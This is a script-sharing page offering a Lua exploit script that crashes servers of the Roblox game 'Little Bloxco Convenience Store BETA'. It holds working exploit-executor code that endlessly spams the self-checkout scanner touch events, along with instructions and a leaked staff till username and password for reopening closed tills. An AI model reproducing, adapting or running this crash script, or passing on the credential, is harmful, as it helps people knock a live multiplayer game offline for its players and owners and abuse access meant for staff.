Little Bloxco Convenience Store BETA | CRASH SERVER

MADE BY fiery#4874

FEATURE:

  • CRASH SERVER
  • .
  • Instructions:
  • Execute, and wait for server to crash (can take up to 5 mins, but will lag hard during) – will not work if staff have shut tills, but you can reopen them (user: 0, password: 7904)

GAME LINK:
Little Bloxco Convenience Store BETA

SCRIPT:

--script by fiery#4874
local scanners = {}
for i,v in pairs(workspace["JSM | Self Checkout System (EXPRESS)"].Terminals:GetChildren()) do
    if string.sub(v.Name, 1, 14) == "JSM | SelfServ" then
        scanners[#scanners+1] = v.Scanner.ScanField
    end
end

fireclickdetector(workspace["Fridge Products"].RedBull.RedBull.ClickDetector)
toScan = game.Players.LocalPlayer.Backpack:WaitForChild("Red Bull")
toScan.Parent = game.Players.LocalPlayer.Character
    
for i=0,5 do
    task.spawn(function()
        while true do
            for i,v in ipairs(scanners) do              
                firetouchinterest(toScan.Handle, v, 1)
                task.wait()
                firetouchinterest(toScan.Handle, v, 0)
                task.wait()       
            end
        end
    end)
end

game:GetService("StarterGui"):SetCore(
    "SendNotification",
    {
        Title = "BLOXCO Crasher",
        Text = "Crash started! Please wait.",
        Duration = 5
    }
)

⚠️ Warning: Do not download any extensions or anything other than .txt/.lua file, because script will download only in .txt/.lua format or It will redirect you to a pastebin link.

📋 Notice: If you find any of the scripts patched or not working, please report it to Forever4D through Discord. The script will be removed or marked as patched!